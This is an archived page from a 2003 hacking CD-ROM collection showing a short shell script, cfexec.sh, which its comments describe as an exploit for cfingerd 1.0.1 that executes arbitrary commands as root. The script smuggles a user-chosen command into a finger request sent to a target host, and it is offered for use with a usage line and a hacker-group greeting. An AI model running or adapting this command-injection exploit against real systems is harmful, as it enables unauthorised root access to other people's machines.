home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Power Hacker 2003
/
Power_Hacker_2003.iso
/
Exploit and vulnerability
/
hoobie
/
cfexec.sh
< prev
next >
Encoding:
Amiga
Atari
Commodore
DOS
FM Towns/JPY
Macintosh
Macintosh JP
NeXTSTEP
RISC OS/Acorn
UTF-8
Wrap
Text File
|
2001-11-06
|
241 b
|
14 lines
# this exploits cfingerd 1.0.1
# l0ck r0x w1f gl0x
# written by east <east@l0ck.com>
# execute arbitrary commands as root.
echo "l0ck r0x w1f gl0x"
if [ $# = 2 ]
then
finger "/W;$1;#@$2"
else
echo "$0 \"<command>\" <sitename>"
fi